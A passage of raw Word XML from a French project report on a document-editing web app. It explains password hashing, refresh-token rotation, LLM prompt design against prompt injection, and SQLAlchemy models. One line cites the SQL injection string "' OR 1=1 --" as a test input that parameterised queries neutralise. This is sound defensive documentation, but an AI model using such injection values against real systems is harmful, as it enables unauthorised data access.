        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt plutôt que SHA-256.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Une fonction de hachage généraliste est conçue pour être</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">rapide</w:t>
      </w:r>
      <w:r>
        <w:t>, ce qui est exactement le défaut recherché par une attaque par force brute. bcrypt est délibérément lente et son coût est paramétrable, ce qui la rend adaptée aux mots de passe. C'est l'inverse du raisonnement appliqué aux jetons, où SHA-256 est le bon choix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">checkpw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">plutôt qu'une comparaison</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La bibliothèque effectue une comparaison à temps constant ; une comparaison naïve fuirait de l'information par le temps de réponse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">La politique de mot de passe n'exige pas de caractère spécial.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">C'est un choix assumé, aligné sur les recommandations récentes de l'ANSSI et du NIST : la longueur contribue davantage à l'entropie qu'une exigence de symbole, qui pousse surtout les utilisateurs vers des substitutions prévisibles (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">P@ssw0rd!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Les quatre règles retenues sont vérifiées côté serveur, et affichées en continu à la saisie côté client (planche W-02).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="94"/>
    <w:bookmarkStart w:id="95" w:name="X3841ddc80888436ccccce202841c81eb7e5b41f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cycle de vie du refresh token : empreinte et rotation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C'est le composant métier le plus délicat du projet. Trois mécanismes se superposent : le stockage sous forme d'empreinte, la rotation à chaque usage, et la détection de réutilisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pourquoi SHA-256 sans sel ici, alors que bcrypt salé pour les mots de passe.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Les deux cas n'ont pas la même menace. Un mot de passe est choisi par un humain, donc de faible entropie et attaquable par dictionnaire : il faut une fonction lente et salée. Un refresh token est 64 octets tirés de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">secrets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, donc inattaquable par dictionnaire : l'empreinte n'a qu'à être non inversible. Utiliser bcrypt ici coûterait du temps de calcul à chaque rafraîchissement sans rien apporter.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">La bonne fonction de hachage dépend de la nature du secret, pas d'une préférence générale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pourquoi la rotation.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un refresh token de 7 jours volé — par une sauvegarde mal protégée, un poste compromis — donnerait sinon 7 jours d'accès. Avec la rotation, le jeton volé ne vaut qu'un seul usage : le premier des deux porteurs à s'en servir invalide l'autre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pourquoi la réutilisation révoque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">tout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Si un jeton déjà consommé se présente, deux acteurs détiennent le même secret à usage unique. Impossible de savoir lequel est le légitime : la seule réponse sûre est de révoquer toutes les sessions et d'obliger à se reconnecter. C'est délibérément brutal — un utilisateur peut être déconnecté par un simple double appel concurrent — mais l'inverse laisserait un voleur en place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Une limite connue :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user_session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">conserve les sessions révoquées (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">revoke = True</w:t>
      </w:r>
      <w:r>
        <w:t>) sans purge automatique. Elle croît donc d'une ligne par rafraîchissement, soit potentiellement plusieurs centaines par utilisateur et par semaine. Une tâche de purge des lignes révoquées et expirées reste à écrire ; elle figure dans les compléments identifiés en § 8.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="95"/>
    <w:bookmarkStart w:id="96" w:name="Xf51a3d54257a64be7b49ee3b176b6ccd9b4c4ad"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ia_service : prompts et appel au modèle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux décisions de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">prompt engineering</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se lisent dans ces gabarits, et elles sont fonctionnelles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">« Réponds uniquement avec le texte reformulé, sans commentaire ni introduction. »</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sans cette consigne, le modèle préfixe sa réponse par « Voici une reformulation plus claire : ». Ce texte serait inséré dans le document de l'utilisateur. La contrainte de format fait donc partie de la spécification, pas du style.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">« sans changer son sens ni ajouter d'informations nouvelles »</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">borne le comportement attendu. Un assistant de rédaction qui inventerait des faits produirait des documents professionnels faux — le risque le plus concret d'une fonctionnalité de complétion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">La consigne libre de l'utilisateur est ajoutée en fin de prompt</w:t>
      </w:r>
      <w:r>
        <w:t>, après le gabarit. Cette position est un choix de sécurité modeste mais réel : elle ne permet pas de réécrire l'instruction initiale par simple préfixe. La protection reste faible face à une injection de prompt déterminée ; la mesure qui compte est ailleurs — aucune sortie du modèle n'est appliquée au document sans action de l'utilisateur (§ 5.6), et la longueur de la consigne est bornée à 500 caractères (§ 5.7).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Ce code est le résultat d'une campagne de diagnostic, et chacun de ses trois partis pris corrige un défaut mesuré. La première version suivait le schéma intuitif — un appel non diffusé, un délai global de 60 secondes, une température unique de 0,7 — et une correction de vingt caractères prenait plus de cinq minutes ou finissait en erreur. La campagne a testé six hypothèses, dont deux que la mesure a écartées : la machine trop lente (53 à 62 jetons par seconde, tout à fait normal) et la consigne /no_think, lue comme du texte puis recopiée dans la réponse. La vraie cause est arrivée en dernier — le chargement du modèle, 426,9 s sur 427,66 s, soit 99,8 % du temps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Le délai de lecture a été retiré. Sur processeur seul, une reformulation de quelques milliers de caractères dépasse la minute : couper à 60 secondes jetait des générations qui aboutissaient, et affichait une erreur alors que rien n'avait échoué. Seul le délai de connexion subsiste, court et volontairement distinct — si Ollama n'est pas lancé, l'échec doit être immédiat. Le couple timeout=(connexion, lecture) de requests permet exactement cette asymétrie. La contrepartie est assumée et notée dans la liste de contrôle de déploiement : sans délai côté application, c'est à gunicorn --timeout de borner un worker bloqué.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Le flux NDJSON est lu ligne par ligne. Avec stream: true, Ollama ne renvoie pas un objet JSON mais une ligne par jeton généré, et response.json() échoue dessus — « Extra data: line 2 column 1 ». L'échec se produisait après le bloc de traduction des erreurs : la route renvoyait un 500 opaque au lieu d'un 502 explicite, au bout de toute l'attente. Les compteurs de jetons ne figurent que sur la dernière ligne, celle qui porte done: true.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>La température dépend de l'action. Les trois n'appellent pas la même liberté : corriger l'orthographe demande au modèle de ne rien changer d'autre, et une température élevée l'incite à reformuler au passage — exactement ce qu'on lui interdit. Compléter, à l'inverse, est une tâche de rédaction où un peu de variété est souhaitable. Les valeurs retenues sont 0,1 pour corriger, 0,3 pour reformuler et 0,7 pour compléter ; la valeur unique de 0,7 servait bien la dernière et desservait la première.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="96"/>
    <w:bookmarkStart w:id="98" w:name="Xeafd286129b77d5803a3979b330ab1ee1e8bd15"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Une précision sur la règle de découpage en couches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>La règle annoncée en § 5.2 — pas de dépendance HTTP dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">services/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— est respectée sur l'essentiel : aucun service ne lit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ne construit de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ni ne choisit de code de statut. C'est ce qui rend les cas TU-01 à TU-15 exécutables sans serveur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Elle mérite cependant une nuance, relevée en relisant le code pour ce dossier :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auth_service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia_service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">importent tous deux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">current_app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pour lire la configuration (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT_SECRET_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OLLAMA_URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OLLAMA_MODEL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). La dépendance à Flask n'est donc pas nulle, elle est réduite au conteneur de configuration. Conséquence pratique : ces fonctions doivent être appelées dans un contexte d'application, y compris en test — d'où la fixture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>du § 9. La correction propre consisterait à passer ces valeurs en paramètres ou par un objet de configuration injecté ; elle est notée en § 8 mais n'a pas été appliquée, pour ne pas toucher à la chaîne d'authentification en fin de projet.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Je préfère documenter l'écart que le présenter comme inexistant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267374E1" w14:textId="00D9B966" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00690DDD" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc198828319"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Des</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> extraits de code de composants d’accès aux données</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La couche de persistance est concentrée dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">database/db.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: modèles, relations, contraintes. Les requêtes vivent dans les routes, mais toutes passent par l'ORM — aucune chaîne SQL n'est construite dans le projet.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="98"/>
    <w:bookmarkStart w:id="99" w:name="Xdbcf75808621f89e154f6fd37467911488902ac"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Déclaration d'un modèle avec SQLAlchemy 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quatre choix d'écriture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L'API 2.0 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mapped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">mapped_column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) plutôt que l'ancienne (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le type déclaré est un vrai type Python :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vue-tsc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a son équivalent côté front, et ici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mypy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ou l'analyseur de VS Code signalent une affectation incohérente avant l'exécution.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mapped[str | None]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Document.id_dossier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rend visible dans le code même que la colonne est nullable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">default=gen_uuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">— la fonction, pas son appel.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Passer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gen_uuid()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">évaluerait l'UUID une seule fois, au chargement du module, et toutes les lignes créées partageraient la même clé primaire. L'erreur est silencieuse jusqu'à la première violation d'unicité. C'est le même piège que les arguments par défaut mutables en Python.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">onupdate=utc_now_naive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">updated_at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>La colonne est alimentée par l'ORM à chaque modification, sans que la route ait à y penser. C'est ce qui rend le tri de la liste des documents fiable, alors que l'enregistrement automatique produit des écritures très fréquentes (§ 7.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cascade="all, delete-orphan"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">doublé de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ondelete="CASCADE"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>La première déclaration agit quand l'application supprime un objet, la seconde quand le SGBD supprime une ligne. Les deux sont nécessaires : le raisonnement RGPD complet figure en § 5.4.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="99"/>
    <w:bookmarkStart w:id="100" w:name="X68ad40c1678b23499c92c06cfb21a9d8e0eeea0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Requêtes paramétrées et filtrage par propriétaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Toutes les requêtes du projet sont écrites avec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">select()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et des comparaisons sur des attributs de modèle. Les valeurs ne sont jamais interpolées dans une chaîne : SQLAlchemy les transmet comme paramètres liés, et une valeur telle que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1 --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>est traitée comme un libellé, pas comme du SQL (cas TS-02, § 9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le filtrage par propriétaire suit un motif constant, appliqué à chaque route de document et de dossier :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3272578" cy="1189664"/>
            <wp:docPr id="44" name="Picture 44"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
